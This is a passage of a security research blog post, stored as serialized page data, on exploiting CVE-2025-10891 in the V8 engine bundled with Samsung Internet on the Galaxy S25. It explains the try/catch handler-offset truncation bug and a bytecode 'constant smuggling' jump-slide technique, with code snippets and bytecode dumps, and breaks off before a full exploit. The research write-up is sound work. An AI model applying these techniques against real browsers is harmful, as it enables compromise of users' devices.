[{"data":1,"prerenderedAt":153741},["ShallowReactive",2],{"blog-/blog/2026-04-01-patch-gap-to-mobile-renderer-rce":3,"featured-blog-posts":10158},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"author":11,"image":15,"isFeatured":19,"onBlogPage":19,"tags":20,"body":23,"_type":10152,"_id":10153,"_source":10154,"_file":10155,"_stem":10156,"_extension":10157},"/blog/2026-04-01-patch-gap-to-mobile-renderer-rce","blog",false,"","Patch Gap to Mobile Renderer RCE: Pwning Samsung Internet's V8 on the Galaxy S25","Samsung Internet on the Galaxy S25 shipped a six-month-old version of V8, exposing it to publicly known bugs. Learn how we exploited a bytecode interpreter vulnerability to achieve renderer RCE and universal XSS in the browser.","2026-04-01T12:00:00.000Z",[12,13,14],"hrvoje","jamie","william",{"src":16,"width":17,"height":18},"/posts/mobile-renderer-rce/title.png",1536,1024,true,[21,22],"RCE","mobile",{"type":24,"children":25,"toc":10132},"root",[26,35,41,57,64,78,100,109,122,131,144,150,163,177,183,197,320,325,333,338,343,364,452,460,479,492,498,504,518,635,640,645,653,658,666,695,724,737,915,920,928,949,962,968,989,1003,1008,1013,1042,1079,1155,1161,1183,1188,1196,1209,1214,1222,1227,1268,1274,1287,1292,1481,1491,1499,1519,1543,1556,1562,1567,2237,2242,2250,2293,4311,4316,4324,4330,4363,4381,4551,4610,4635,4737,4742,5536,5541,5549,5560,7608,7613,7621,7627,7650,7664,7677,7689,7719,7724,8200,8228,8335,8352,8509,8514,8526,8822,8848,8873,9013,9026,9031,9184,9220,9233,9238,9365,9406,9486,9491,10077,10083,10095,10110,10116,10121,10126],{"type":27,"tag":28,"props":29,"children":31},"element","h2",{"id":30},"introduction",[32],{"type":33,"value":34},"text","Introduction",{"type":27,"tag":36,"props":37,"children":38},"p",{},[39],{"type":33,"value":40},"The supply chain dependency in today's software landscape is extremely complex. Any vulnerability in a core library creates an exploitable window for its dependents - maintainers either fall behind on the exhausting update schedule, backport incorrectly, or even forget about it entirely.",{"type":27,"tag":36,"props":42,"children":43},{},[44,46,55],{"type":33,"value":45},"One such example is V8, a JavaScript engine used ubiquitously in Chromium and Node.js-based software. In collaboration with the ",{"type":27,"tag":47,"props":48,"children":52},"a",{"href":49,"rel":50},"https://cor.team",[51],"nofollow",[53],{"type":33,"value":54},"Crusaders of Rust",{"type":33,"value":56}," Security Research Group, we decided to analyze the version of V8 in Samsung Internet (the default browser on Samsung phones) on a Samsung Galaxy S25 in hopes of an n-day exploitation opportunity.",{"type":27,"tag":58,"props":59,"children":61},"h3",{"id":60},"finding-the-v8-version",[62],{"type":33,"value":63},"Finding the V8 Version",{"type":27,"tag":36,"props":65,"children":66},{},[67,69,76],{"type":33,"value":68},"We started by pulling Samsung Internet's APK from the device over ",{"type":27,"tag":47,"props":70,"children":73},{"href":71,"rel":72},"https://developer.android.com/tools/adb",[51],[74],{"type":33,"value":75},"adb",{"type":33,"value":77}," and inspecting the libraries it shipped with.",{"type":27,"tag":36,"props":79,"children":80},{},[81,83,90,92,98],{"type":33,"value":82},"After extracting the APK, we searched the ",{"type":27,"tag":84,"props":85,"children":87},"code",{"className":86},[],[88],{"type":33,"value":89},"lib/",{"type":33,"value":91}," directory for ",{"type":27,"tag":84,"props":93,"children":95},{"className":94},[],[96],{"type":33,"value":97},"v8::*",{"type":33,"value":99}," symbols:",{"type":27,"tag":101,"props":102,"children":104},"pre",{"code":103},"$ grep -r 'v8::' lib/\ngrep: lib/arm64-v8a/libterrace.so: binary file matches\n",[105],{"type":27,"tag":84,"props":106,"children":107},{"__ignoreMap":7},[108],{"type":33,"value":103},{"type":27,"tag":36,"props":110,"children":111},{},[112,114,120],{"type":33,"value":113},"Only one file matched our search: ",{"type":27,"tag":84,"props":115,"children":117},{"className":116},[],[118],{"type":33,"value":119},"libterrace.so",{"type":33,"value":121},". We then loaded it into a decompiler to inspect it more closely, which is where we found the bundled V8 version:",{"type":27,"tag":36,"props":123,"children":124},{},[125],{"type":27,"tag":126,"props":127,"children":130},"img",{"alt":128,"src":129},"image1","/posts/mobile-renderer-rce/image1.png",[],{"type":27,"tag":36,"props":132,"children":133},{},[134,136,142],{"type":33,"value":135},"Surprisingly, this ",{"type":27,"tag":84,"props":137,"children":139},{"className":138},[],[140],{"type":33,"value":141},"13.6.233.10",{"type":33,"value":143}," version was already six months old at the time, with multiple publicly known bugs affecting it.",{"type":27,"tag":58,"props":145,"children":147},{"id":146},"choosing-the-bug",[148],{"type":33,"value":149},"Choosing the Bug",{"type":27,"tag":36,"props":151,"children":152},{},[153,155,161],{"type":33,"value":154},"We were able to trigger a couple of bugs on our locally compiled ",{"type":27,"tag":84,"props":156,"children":158},{"className":157},[],[159],{"type":33,"value":160},"d8",{"type":33,"value":162}," matching the target version. One of them was CVE-2025-5419 - a store-store elimination bug that we managed to get working on the device. However, exploitation required heap spraying, which would present significant stability issues when porting to the phone.",{"type":27,"tag":36,"props":164,"children":165},{},[166,168,175],{"type":33,"value":167},"Another one was ",{"type":27,"tag":47,"props":169,"children":172},{"href":170,"rel":171},"https://issuetracker.google.com/issues/443875388",[51],[173],{"type":33,"value":174},"CVE-2025-10891",{"type":33,"value":176}," - a bug in the Ignition bytecode interpreter. This one was attractive as bytecode is treated as trusted under the V8 sandbox model, meaning that a separate Übercage bypass would not be required. Given this, we decided to explore this bug further.",{"type":27,"tag":28,"props":178,"children":180},{"id":179},"ignition-bytecode-introduction",[181],{"type":33,"value":182},"Ignition Bytecode Introduction",{"type":27,"tag":36,"props":184,"children":185},{},[186,188,195],{"type":33,"value":187},"V8 initially compiles all JS code to a bytecode format with the ",{"type":27,"tag":47,"props":189,"children":192},{"href":190,"rel":191},"https://v8.dev/blog/ignition-interpreter",[51],[193],{"type":33,"value":194},"Ignition",{"type":33,"value":196}," interpreter.\nThis is a simple register-based VM with fixed size opcodes (and prefix bytes to increase operand width). For instance:",{"type":27,"tag":101,"props":198,"children":202},{"code":199,"language":200,"meta":7,"className":201,"style":7},"let a = 1;\nlet b = 0x0fff;\nlet c = 0x0fffffff;\nlet d = 0xffffffff;\n","js","language-js shiki shiki-themes slack-dark",[203],{"type":27,"tag":84,"props":204,"children":205},{"__ignoreMap":7},[206,242,268,294],{"type":27,"tag":207,"props":208,"children":211},"span",{"class":209,"line":210},"line",1,[212,218,224,230,236],{"type":27,"tag":207,"props":213,"children":215},{"style":214},"--shiki-default:#569CD6",[216],{"type":33,"value":217},"let",{"type":27,"tag":207,"props":219,"children":221},{"style":220},"--shiki-default:#9CDCFE",[222],{"type":33,"value":223}," a",{"type":27,"tag":207,"props":225,"children":227},{"style":226},"--shiki-default:#D4D4D4",[228],{"type":33,"value":229}," =",{"type":27,"tag":207,"props":231,"children":233},{"style":232},"--shiki-default:#B5CEA8",[234],{"type":33,"value":235}," 1",{"type":27,"tag":207,"props":237,"children":239},{"style":238},"--shiki-default:#E6E6E6",[240],{"type":33,"value":241},";\n",{"type":27,"tag":207,"props":243,"children":245},{"class":209,"line":244},2,[246,250,255,259,264],{"type":27,"tag":207,"props":247,"children":248},{"style":214},[249],{"type":33,"value":217},{"type":27,"tag":207,"props":251,"children":252},{"style":220},[253],{"type":33,"value":254}," b",{"type":27,"tag":207,"props":256,"children":257},{"style":226},[258],{"type":33,"value":229},{"type":27,"tag":207,"props":260,"children":261},{"style":232},[262],{"type":33,"value":263}," 0x0fff",{"type":27,"tag":207,"props":265,"children":266},{"style":238},[267],{"type":33,"value":241},{"type":27,"tag":207,"props":269,"children":271},{"class":209,"line":270},3,[272,276,281,285,290],{"type":27,"tag":207,"props":273,"children":274},{"style":214},[275],{"type":33,"value":217},{"type":27,"tag":207,"props":277,"children":278},{"style":220},[279],{"type":33,"value":280}," c",{"type":27,"tag":207,"props":282,"children":283},{"style":226},[284],{"type":33,"value":229},{"type":27,"tag":207,"props":286,"children":287},{"style":232},[288],{"type":33,"value":289}," 0x0fffffff",{"type":27,"tag":207,"props":291,"children":292},{"style":238},[293],{"type":33,"value":241},{"type":27,"tag":207,"props":295,"children":297},{"class":209,"line":296},4,[298,302,307,311,316],{"type":27,"tag":207,"props":299,"children":300},{"style":214},[301],{"type":33,"value":217},{"type":27,"tag":207,"props":303,"children":304},{"style":220},[305],{"type":33,"value":306}," d",{"type":27,"tag":207,"props":308,"children":309},{"style":226},[310],{"type":33,"value":229},{"type":27,"tag":207,"props":312,"children":313},{"style":232},[314],{"type":33,"value":315}," 0xffffffff",{"type":27,"tag":207,"props":317,"children":318},{"style":238},[319],{"type":33,"value":241},{"type":27,"tag":36,"props":321,"children":322},{},[323],{"type":33,"value":324},"compiles to",{"type":27,"tag":101,"props":326,"children":328},{"code":327}," # Load the Smi `1` into the accumulator\n 0 : 0d 01 LdaSmi [1]\n # Store it to register 0\n 2 : ce Star0\n # Load the 2-byte Smi `0xfff` into acc\n 3 : 00 0d ff 0f LdaSmi.Wide [4095]\n # Store it to register 1\n 7 : cd Star1\n # Load the 4-byte Smi `0xfffffff` into acc\n 8 : 01 0d ff ff ff 0f LdaSmi.ExtraWide [268435455]\n # Store it to register 2\n14 : cc Star2\n# `0xffffffff` doesn't fit into an Smi, so a `HeapNumber` is allocated in the function's constant pool and loaded\n15 : 13 00 LdaConstant [0]\n# Store it to register 3\n17 : cb Star3\n18 : 0e LdaUndefined\n19 : b3 Return\n",[329],{"type":27,"tag":84,"props":330,"children":331},{"__ignoreMap":7},[332],{"type":33,"value":327},{"type":27,"tag":36,"props":334,"children":335},{},[336],{"type":33,"value":337},"Ignition bytecode is then passed through the Sparkplug, Maglev, and Turbofan JIT compilers depending on the required amount of optimization. Yes, V8 has FOUR compilers, all so that slop devs can continue \"engineering\" their RAM-hungry, CPU-draining web apps that have plagued the modern internet.",{"type":27,"tag":58,"props":339,"children":341},{"id":340},"cve-2025-10891",[342],{"type":33,"value":174},{"type":27,"tag":36,"props":344,"children":345},{},[346,348,354,356,362],{"type":33,"value":347},"The bug is in the handling of try/catch blocks. These are encoded in a function as a list of ",{"type":27,"tag":84,"props":349,"children":351},{"className":350},[],[352],{"type":33,"value":353},"[start, end) => handler",{"type":33,"value":355}," offsets - if an exception is thrown in the given bytecode address range, ",{"type":27,"tag":84,"props":357,"children":359},{"className":358},[],[360],{"type":33,"value":361},"handler",{"type":33,"value":363}," is jumped to.",{"type":27,"tag":101,"props":365,"children":367},{"code":366,"language":200,"meta":7,"className":201,"style":7},"try {\n throw 1;\n} catch {\n let b = 2;\n}\n",[368],{"type":27,"tag":84,"props":369,"children":370},{"__ignoreMap":7},[371,385,401,418,443],{"type":27,"tag":207,"props":372,"children":373},{"class":209,"line":210},[374,380],{"type":27,"tag":207,"props":375,"children":377},{"style":376},"--shiki-default:#C586C0",[378],{"type":33,"value":379},"try",{"type":27,"tag":207,"props":381,"children":382},{"style":238},[383],{"type":33,"value":384}," {\n",{"type":27,"tag":207,"props":386,"children":387},{"class":209,"line":244},[388,393,397],{"type":27,"tag":207,"props":389,"children":390},{"style":376},[391],{"type":33,"value":392}," throw",{"type":27,"tag":207,"props":394,"children":395},{"style":232},[396],{"type":33,"value":235},{"type":27,"tag":207,"props":398,"children":399},{"style":238},[400],{"type":33,"value":241},{"type":27,"tag":207,"props":402,"children":403},{"class":209,"line":270},[404,409,414],{"type":27,"tag":207,"props":405,"children":406},{"style":238},[407],{"type":33,"value":408},"} ",{"type":27,"tag":207,"props":410,"children":411},{"style":376},[412],{"type":33,"value":413},"catch",{"type":27,"tag":207,"props":415,"children":416},{"style":238},[417],{"type":33,"value":384},{"type":27,"tag":207,"props":419,"children":420},{"class":209,"line":296},[421,426,430,434,439],{"type":27,"tag":207,"props":422,"children":423},{"style":214},[424],{"type":33,"value":425}," let",{"type":27,"tag":207,"props":427,"children":428},{"style":220},[429],{"type":33,"value":254},{"type":27,"tag":207,"props":431,"children":432},{"style":226},[433],{"type":33,"value":229},{"type":27,"tag":207,"props":435,"children":436},{"style":232},[437],{"type":33,"value":438}," 2",{"type":27,"tag":207,"props":440,"children":441},{"style":238},[442],{"type":33,"value":241},{"type":27,"tag":207,"props":444,"children":446},{"class":209,"line":445},5,[447],{"type":27,"tag":207,"props":448,"children":449},{"style":238},[450],{"type":33,"value":451},"}\n",{"type":27,"tag":101,"props":453,"children":455},{"code":454}," 0 : 1b ff f8 Mov \u003Ccontext>, r1\n # Start of try block\n # ---------------------------------\n 3 : 0d 01 LdaSmi [1]\n 5 : b1 Throw\n # ---------------------------------\n 6 : 10 LdaTheHole\n 7 : b0 SetPendingMessage\n # Start of catch handler\n 8 : 0d 02 LdaSmi [2]\n10 : ce Star0\n11 : 0e LdaUndefined\n12 : b3 Return\nHandler Table (size = 16)\n from to hdlr (prediction, data)\n ( 3, 6) -> 6 (prediction=1, data=1)\n",[456],{"type":27,"tag":84,"props":457,"children":458},{"__ignoreMap":7},[459],{"type":33,"value":454},{"type":27,"tag":36,"props":461,"children":462},{},[463,465,470,472,477],{"type":33,"value":464},"However, the ",{"type":27,"tag":84,"props":466,"children":468},{"className":467},[],[469],{"type":33,"value":361},{"type":33,"value":471}," offset is stored in a 28-bit bitfield. If the address of the ",{"type":27,"tag":84,"props":473,"children":475},{"className":474},[],[476],{"type":33,"value":413},{"type":33,"value":478}," block does not fit within 28 bits, it will be silently truncated. This will lead to a jump into a completely different part of the code - even in the middle of an instruction.",{"type":27,"tag":36,"props":480,"children":481},{},[482,484,490],{"type":33,"value":483},"One easy way to generate a large enough function, as suggested in the initial report, is to emit many ",{"type":27,"tag":84,"props":485,"children":487},{"className":486},[],[488],{"type":33,"value":489},"yield*",{"type":33,"value":491}," statements, as that drastically increases the size of the Ignition bytecode.",{"type":27,"tag":28,"props":493,"children":495},{"id":494},"exploitation",[496],{"type":33,"value":497},"Exploitation",{"type":27,"tag":58,"props":499,"children":501},{"id":500},"constant-smuggling",[502],{"type":33,"value":503},"Constant Smuggling",{"type":27,"tag":36,"props":505,"children":506},{},[507,509,516],{"type":33,"value":508},"Our initial approach to exploitation was inspired by the 'shellcode smuggling' ",{"type":27,"tag":47,"props":510,"children":513},{"href":511,"rel":512},"https://blog.exodusintel.com/2024/01/19/google-chrome-v8-cve-2024-0517-out-of-bounds-write-code-execution/",[51],[514],{"type":33,"value":515},"technique",{"type":33,"value":517}," - when arbitrary read-write is achieved in browser exploits, we can often JIT compile a function like this:",{"type":27,"tag":101,"props":519,"children":521},{"code":520,"language":200,"meta":7,"className":201,"style":7},"let a = -9.255963134931783e61;\nlet b = -9.255963134931783e61;\nlet c = -9.255963134931783e61;\nlet d = -9.255963134931783e61;\n",[522],{"type":27,"tag":84,"props":523,"children":524},{"__ignoreMap":7},[525,554,581,608],{"type":27,"tag":207,"props":526,"children":527},{"class":209,"line":210},[528,532,536,540,545,550],{"type":27,"tag":207,"props":529,"children":530},{"style":214},[531],{"type":33,"value":217},{"type":27,"tag":207,"props":533,"children":534},{"style":220},[535],{"type":33,"value":223},{"type":27,"tag":207,"props":537,"children":538},{"style":226},[539],{"type":33,"value":229},{"type":27,"tag":207,"props":541,"children":542},{"style":226},[543],{"type":33,"value":544}," -",{"type":27,"tag":207,"props":546,"children":547},{"style":232},[548],{"type":33,"value":549},"9.255963134931783e61",{"type":27,"tag":207,"props":551,"children":552},{"style":238},[553],{"type":33,"value":241},{"type":27,"tag":207,"props":555,"children":556},{"class":209,"line":244},[557,561,565,569,573,577],{"type":27,"tag":207,"props":558,"children":559},{"style":214},[560],{"type":33,"value":217},{"type":27,"tag":207,"props":562,"children":563},{"style":220},[564],{"type":33,"value":254},{"type":27,"tag":207,"props":566,"children":567},{"style":226},[568],{"type":33,"value":229},{"type":27,"tag":207,"props":570,"children":571},{"style":226},[572],{"type":33,"value":544},{"type":27,"tag":207,"props":574,"children":575},{"style":232},[576],{"type":33,"value":549},{"type":27,"tag":207,"props":578,"children":579},{"style":238},[580],{"type":33,"value":241},{"type":27,"tag":207,"props":582,"children":583},{"class":209,"line":270},[584,588,592,596,600,604],{"type":27,"tag":207,"props":585,"children":586},{"style":214},[587],{"type":33,"value":217},{"type":27,"tag":207,"props":589,"children":590},{"style":220},[591],{"type":33,"value":280},{"type":27,"tag":207,"props":593,"children":594},{"style":226},[595],{"type":33,"value":229},{"type":27,"tag":207,"props":597,"children":598},{"style":226},[599],{"type":33,"value":544},{"type":27,"tag":207,"props":601,"children":602},{"style":232},[603],{"type":33,"value":549},{"type":27,"tag":207,"props":605,"children":606},{"style":238},[607],{"type":33,"value":241},{"type":27,"tag":207,"props":609,"children":610},{"class":209,"line":296},[611,615,619,623,627,631],{"type":27,"tag":207,"props":612,"children":613},{"style":214},[614],{"type":33,"value":217},{"type":27,"tag":207,"props":616,"children":617},{"style":220},[618],{"type":33,"value":306},{"type":27,"tag":207,"props":620,"children":621},{"style":226},[622],{"type":33,"value":229},{"type":27,"tag":207,"props":624,"children":625},{"style":226},[626],{"type":33,"value":544},{"type":27,"tag":207,"props":628,"children":629},{"style":232},[630],{"type":33,"value":549},{"type":27,"tag":207,"props":632,"children":633},{"style":238},[634],{"type":33,"value":241},{"type":27,"tag":36,"props":636,"children":637},{},[638],{"type":33,"value":639},"These floating-point constants will compile to 8-byte constants inside the machine code (the last 2 of which are used to jump into the next constant).",{"type":27,"tag":36,"props":641,"children":642},{},[643],{"type":33,"value":644},"We'll use a similar principle here, although much more limited. With",{"type":27,"tag":101,"props":646,"children":648},{"code":647},"let a = 0x0693bebe;\n",[649],{"type":27,"tag":84,"props":650,"children":651},{"__ignoreMap":7},[652],{"type":33,"value":647},{"type":27,"tag":36,"props":654,"children":655},{},[656],{"type":33,"value":657},"We will compile the bytecode:",{"type":27,"tag":101,"props":659,"children":661},{"code":660},"01 0d be be 93 06 LdaSmi.ExtraWide\n",[662],{"type":27,"tag":84,"props":663,"children":664},{"__ignoreMap":7},[665],{"type":33,"value":660},{"type":27,"tag":36,"props":667,"children":668},{},[669,671,677,679,685,687,693],{"type":33,"value":670},"We can then jump to the 3rd byte (",{"type":27,"tag":84,"props":672,"children":674},{"className":673},[],[675],{"type":33,"value":676},"0xbe",{"type":33,"value":678},"), and gain 2 controlled bytes of execution, followed by ",{"type":27,"tag":84,"props":680,"children":682},{"className":681},[],[683],{"type":33,"value":684},"0x93 0x02 - 0xf",{"type":33,"value":686}," (",{"type":27,"tag":84,"props":688,"children":690},{"className":689},[],[691],{"type":33,"value":692},"Jump +[2-15]",{"type":33,"value":694},") to jump into the next constant.",{"type":27,"tag":36,"props":696,"children":697},{},[698,700,706,708,714,716,722],{"type":33,"value":699},"Note that the jump constant will change as the subsequent store instruction becomes longer due to storing to deeper registers. Storing to registers 1-15 resulted in simple one byte ",{"type":27,"tag":84,"props":701,"children":703},{"className":702},[],[704],{"type":33,"value":705},"StarX",{"type":33,"value":707}," instructions, registers 16-121 resulted in two bytes ",{"type":27,"tag":84,"props":709,"children":711},{"className":710},[],[712],{"type":33,"value":713},"Star rX",{"type":33,"value":715}," instructions, and the next batch resulted in 4 byte ",{"type":27,"tag":84,"props":717,"children":719},{"className":718},[],[720],{"type":33,"value":721},"Star.ExtraWide rX",{"type":33,"value":723}," instructions.",{"type":27,"tag":36,"props":725,"children":726},{},[727,729,735],{"type":33,"value":728},"With these short jumps, we can actually construct a massive jump slide of constants like ",{"type":27,"tag":84,"props":730,"children":732},{"className":731},[],[733],{"type":33,"value":734},"0x8931111",{"type":33,"value":736},":",{"type":27,"tag":101,"props":738,"children":740},{"code":739,"language":200,"meta":7,"className":201,"style":7},"let a206 = 0x8931111;\nlet a207 = 0x8931111;\nlet a208 = 0x8931111;\nlet a209 = 0x8931111;\nlet a210 = 0x8931111;\nlet a211 = 0x8931111;\nlet a212 = 0x8931111;\n",[741],{"type":27,"tag":84,"props":742,"children":743},{"__ignoreMap":7},[744,769,793,817,841,865,890],{"type":27,"tag":207,"props":745,"children":746},{"class":209,"line":210},[747,751,756,760,765],{"type":27,"tag":207,"props":748,"children":749},{"style":214},[750],{"type":33,"value":217},{"type":27,"tag":207,"props":752,"children":753},{"style":220},[754],{"type":33,"value":755}," a206",{"type":27,"tag":207,"props":757,"children":758},{"style":226},[759],{"type":33,"value":229},{"type":27,"tag":207,"props":761,"children":762},{"style":232},[763],{"type":33,"value":764}," 0x8931111",{"type":27,"tag":207,"props":766,"children":767},{"style":238},[768],{"type":33,"value":241},{"type":27,"tag":207,"props":770,"children":771},{"class":209,"line":244},[772,776,781,785,789],{"type":27,"tag":207,"props":773,"children":774},{"style":214},[775],{"type":33,"value":217},{"type":27,"tag":207,"props":777,"children":778},{"style":220},[779],{"type":33,"value":780}," a207",{"type":27,"tag":207,"props":782,"children":783},{"style":226},[784],{"type":33,"value":229},{"type":27,"tag":207,"props":786,"children":787},{"style":232},[788],{"type":33,"value":764},{"type":27,"tag":207,"props":790,"children":791},{"style":238},[792],{"type":33,"value":241},{"type":27,"tag":207,"props":794,"children":795},{"class":209,"line":270},[796,800,805,809,813],{"type":27,"tag":207,"props":797,"children":798},{"style":214},[799],{"type":33,"value":217},{"type":27,"tag":207,"props":801,"children":802},{"style":220},[803],{"type":33,"value":804}," a208",{"type":27,"tag":207,"props":806,"children":807},{"style":226},[808],{"type":33,"value":229},{"type":27,"tag":207,"props":810,"children":811},{"style":232},[812],{"type":33,"value":764},{"type":27,"tag":207,"props":814,"children":815},{"style":238},[816],{"type":33,"value":241},{"type":27,"tag":207,"props":818,"children":819},{"class":209,"line":296},[820,824,829,833,837],{"type":27,"tag":207,"props":821,"children":822},{"style":214},[823],{"type":33,"value":217},{"type":27,"tag":207,"props":825,"children":826},{"style":220},[827],{"type":33,"value":828}," a209",{"type":27,"tag":207,"props":830,"children":831},{"style":226},[832],{"type":33,"value":229},{"type":27,"tag":207,"props":834,"children":835},{"style":232},[836],{"type":33,"value":764},{"type":27,"tag":207,"props":838,"children":839},{"style":238},[840],{"type":33,"value":241},{"type":27,"tag":207,"props":842,"children":843},{"class":209,"line":445},[844,848,853,857,861],{"type":27,"tag":207,"props":845,"children":846},{"style":214},[847],{"type":33,"value":217},{"type":27,"tag":207,"props":849,"children":850},{"style":220},[851],{"type":33,"value":852}," a210",{"type":27,"tag":207,"props":854,"children":855},{"style":226},[856],{"type":33,"value":229},{"type":27,"tag":207,"props":858,"children":859},{"style":232},[860],{"type":33,"value":764},{"type":27,"tag":207,"props":862,"children":863},{"style":238},[864],{"type":33,"value":241},{"type":27,"tag":207,"props":866,"children":868},{"class":209,"line":867},6,[869,873,878,882,886],{"type":27,"tag":207,"props":870,"children":871},{"style":214},[872],{"type":33,"value":217},{"type":27,"tag":207,"props":874,"children":875},{"style":220},[876],{"type":33,"value":877}," a211",{"type":27,"tag":207,"props":879,"children":880},{"style":226},[881],{"type":33,"value":229},{"type":27,"tag":207,"props":883,"children":884},{"style":232},[885],{"type":33,"value":764},{"type":27,"tag":207,"props":887,"children":888},{"style":238},[889],{"type":33,"value":241},{"type":27,"tag":207,"props":891,"children":893},{"class":209,"line":892},7,[894,898,903,907,911],{"type":27,"tag":207,"props":895,"children":896},{"style":214},[897],{"type":33,"value":217},{"type":27,"tag":207,"props":899,"children":900},{"style":220},[901],{"type":33,"value":902}," a212",{"type":27,"tag":207,"props":904,"children":905},{"style":226},[906],{"type":33,"value":229},{"type":27,"tag":207,"props":908,"children":909},{"style":232},[910],{"type":33,"value":764},{"type":27,"tag":207,"props":912,"children":913},{"style":238},[914],{"type":33,"value":241},{"type":27,"tag":36,"props":916,"children":917},{},[918],{"type":33,"value":919},"Those instructions result in:",{"type":27,"tag":101,"props":921,"children":923},{"code":922},"00: LdaTrue;\n01: LdaTrue;\n02: Jump +8; >------------+\n04: Star rX + LdaSmi ... |\nv--------------------------+\n0a: LdaTrue;\n0b: LdaTrue;\n",[924],{"type":27,"tag":84,"props":925,"children":926},{"__ignoreMap":7},[927],{"type":33,"value":922},{"type":27,"tag":36,"props":929,"children":930},{},[931,933,939,941,947],{"type":33,"value":932},"(The offset of ",{"type":27,"tag":84,"props":934,"children":936},{"className":935},[],[937],{"type":33,"value":938},"Jump",{"type":33,"value":940}," instructions is added to the ",{"type":27,"tag":942,"props":943,"children":944},"em",{},[945],{"type":33,"value":946},"start",{"type":33,"value":948}," of the instruction.)",{"type":27,"tag":36,"props":950,"children":951},{},[952,954,960],{"type":33,"value":953},"Now, 3 out of the 6 bytes in a ",{"type":27,"tag":84,"props":955,"children":957},{"className":956},[],[958],{"type":33,"value":959},"LdaSmi.ExtraWide",{"type":33,"value":961}," instruction are valid for merging into the smuggled arbitrary Ignition bytecode. This slide made exploit development a lot easier, as any additional code would cause the exception table to have new offsets.",{"type":27,"tag":58,"props":963,"children":965},{"id":964},"exploit-goal",[966],{"type":33,"value":967},"Exploit Goal",{"type":27,"tag":36,"props":969,"children":970},{},[971,973,979,981,987],{"type":33,"value":972},"Initially we considered using ",{"type":27,"tag":84,"props":974,"children":976},{"className":975},[],[977],{"type":33,"value":978},"Star",{"type":33,"value":980},"/",{"type":27,"tag":84,"props":982,"children":984},{"className":983},[],[985],{"type":33,"value":986},"Ldar",{"type":33,"value":988}," instructions to store to out-of-bounds register indexes, as registers are stored on the regular stack. However, with only 2 bytes we can only access +/- 0x7f registers, which does not allow us to go out of bounds enough to access interesting values.",{"type":27,"tag":36,"props":990,"children":991},{},[992,994,1001],{"type":33,"value":993},"We realized that register offsets 0 and 1 contain the saved frame pointer and return address respectively. We considered using this to ",{"type":27,"tag":47,"props":995,"children":998},{"href":996,"rel":997},"https://github.com/google/google-ctf/tree/main/2023/quals/sandbox-v8box/solution",[51],[999],{"type":33,"value":1000},"stack pivot and ROP",{"type":33,"value":1002},". However, there were numerous downsides - primarily, we would need multiple leaks of binary addresses and the JS heap (to construct a buffer with a fake stack frame).",{"type":27,"tag":36,"props":1004,"children":1005},{},[1006],{"type":33,"value":1007},"Additionally, the interpreter expects all values to be tagged V8 values (i.e. 32-bit compressed pointers or Smis). This means that operating on 64-bit addresses can cause surprising truncations or 'untagging' extensions.",{"type":27,"tag":36,"props":1009,"children":1010},{},[1011],{"type":33,"value":1012},"Finally, ROP/stack pivoting-based approaches would cause significant work when porting from our x86_64 development machines to the aarch64 target device, and might not even be feasible given the existence of PAC and BTI on the Galaxy S25.",{"type":27,"tag":36,"props":1014,"children":1015},{},[1016,1018,1024,1026,1032,1034,1040],{"type":33,"value":1017},"At this point, we identified an interesting opcode: ",{"type":27,"tag":84,"props":1019,"children":1021},{"className":1020},[],[1022],{"type":33,"value":1023},"CallRuntime",{"type":33,"value":1025},". Runtime functions are used to implement a lot of core V8 functionality, and are native functions exposed to bytecode (but not to the user, unless ",{"type":27,"tag":84,"props":1027,"children":1029},{"className":1028},[],[1030],{"type":33,"value":1031},"--allow-natives-syntax",{"type":33,"value":1033}," is enabled). Many of these allow powerful functionality as inputs are assumed to be trusted, but one stands out: ",{"type":27,"tag":84,"props":1035,"children":1037},{"className":1036},[],[1038],{"type":33,"value":1039},"DeserializeWasmModule",{"type":33,"value":1041},".",{"type":27,"tag":36,"props":1043,"children":1044},{},[1045,1047,1054,1056,1061,1062,1068,1070,1077],{"type":33,"value":1046},"WebAssembly modules may be internally serialized and deserialized by the runtime - this serialization format includes raw machine code for any ",{"type":27,"tag":47,"props":1048,"children":1051},{"href":1049,"rel":1050},"https://gist.github.com/Riatre/83d5fdb970946c8e185c5e1b2b842b1b",[51],[1052],{"type":33,"value":1053},"JIT-compiled functions",{"type":33,"value":1055},". ",{"type":27,"tag":84,"props":1057,"children":1059},{"className":1058},[],[1060],{"type":33,"value":1039},{"type":33,"value":980},{"type":27,"tag":84,"props":1063,"children":1065},{"className":1064},[],[1066],{"type":33,"value":1067},"SerializeWasmModule",{"type":33,"value":1069}," themselves are only used from test functions, and indeed have been ",{"type":27,"tag":47,"props":1071,"children":1074},{"href":1072,"rel":1073},"https://chromium-review.googlesource.com/c/v8/v8/+/6875821",[51],[1075],{"type":33,"value":1076},"removed",{"type":33,"value":1078}," from recent production V8 builds due to how abusable this functionality is.",{"type":27,"tag":36,"props":1080,"children":1081},{},[1082,1084,1090,1092,1098,1100,1106,1108,1114,1116,1122,1124,1130,1132,1138,1140,1146,1148,1153],{"type":33,"value":1083},"However, calling this opcode represented a significant challenge:\n",{"type":27,"tag":84,"props":1085,"children":1087},{"className":1086},[],[1088],{"type":33,"value":1089},"CallRuntime \u003Cfunc-id> \u003Cargs> \u003Cargc>",{"type":33,"value":1091},"\nWhere ",{"type":27,"tag":84,"props":1093,"children":1095},{"className":1094},[],[1096],{"type":33,"value":1097},"func-id",{"type":33,"value":1099}," is a 2-byte function ID, ",{"type":27,"tag":84,"props":1101,"children":1103},{"className":1102},[],[1104],{"type":33,"value":1105},"args",{"type":33,"value":1107}," is the index of the last register passed and ",{"type":27,"tag":84,"props":1109,"children":1111},{"className":1110},[],[1112],{"type":33,"value":1113},"argc",{"type":33,"value":1115}," is the number of arguments passed (e.g. passing ",{"type":27,"tag":84,"props":1117,"children":1119},{"className":1118},[],[1120],{"type":33,"value":1121},"r0",{"type":33,"value":1123},", ",{"type":27,"tag":84,"props":1125,"children":1127},{"className":1126},[],[1128],{"type":33,"value":1129},"r1",{"type":33,"value":1131}," and ",{"type":27,"tag":84,"props":1133,"children":1135},{"className":1134},[],[1136],{"type":33,"value":1137},"r2",{"type":33,"value":1139}," would be encoded as ",{"type":27,"tag":84,"props":1141,"children":1143},{"className":1142},[],[1144],{"type":33,"value":1145},"\u003Cr2> \u003C3>",{"type":33,"value":1147},").\nThis requires ",{"type":27,"tag":942,"props":1149,"children":1150},{},[1151],{"type":33,"value":1152},"5",{"type":33,"value":1154}," bytes of control - additionally, we must then store the accumulator safely into a register, then return the value back to JS 